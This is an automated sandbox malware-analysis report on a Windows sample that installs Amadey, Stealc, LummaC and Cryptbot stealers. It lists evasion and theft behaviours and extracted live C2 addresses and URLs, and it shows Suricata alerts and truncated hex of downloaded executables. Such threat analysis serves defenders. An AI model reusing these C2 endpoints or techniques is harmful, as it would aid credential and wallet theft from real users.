Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561549
MD5: ee9c5875f526c3f44381beb36b6eaa62
SHA1: 423ea51703796def5f3449b68c8bc62298187766
SHA256: cd0973917f80520e71b932aa1c2ac651794b4da6ba5cb85de4e8910783d35690
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Excessive usage of taskkill to terminate processes
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000002.00000003.1779970897.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: d015c0e328.exe.5236.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.65.91:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50135 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50224 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.17:443 -> 192.168.2.4:50249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50255 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: d015c0e328.exe, 00000007.00000002.2927972288.0000000006402000.00000040.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2816413833.0000000008340000.00000004.00001000.00020000.00000000.sdmp
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49742 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49772 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49793 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49794 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49819 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49871 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49854 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50010
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50079 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50153 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50161 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50201 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50268 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49805 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49805 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49812 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49812 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49778 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49778 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49829 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49848 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49830 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49830 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49870 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49840 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49840 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49886 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49771 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49946 -> 172.67.162.84:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 36
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:10 GMTContent-Type: application/octet-streamContent-Length: 1857536Last-Modified: Sat, 23 Nov 2024 16:31:34 GMTConnection: keep-aliveETag: "67420366-1c5800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 28 1a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6b 7a 66 6f 76 63 67 00 c0 19 00 00 f0 2f 00 00 b8 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 67 67 68 6a 61 6f 00 10 00 00 00 b0 49 00 00 06 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 36 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:18 GMTContent-Type: application/octet-streamContent-Length: 1787392Last-Modified: Sat, 23 Nov 2024 16:31:41 GMTConnection: keep-aliveETag: "6742036d-1b4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 b9 98 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 73 78 75 69 6c 6a 70 00 b0 19 00 00 00 4f 00 00 a8 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 73 63 6a 69 61 62 76 00 10 00 00 00 b0 68 00 00 04 00 00 00 20 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 68 00 00 22 00 00 00 24 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
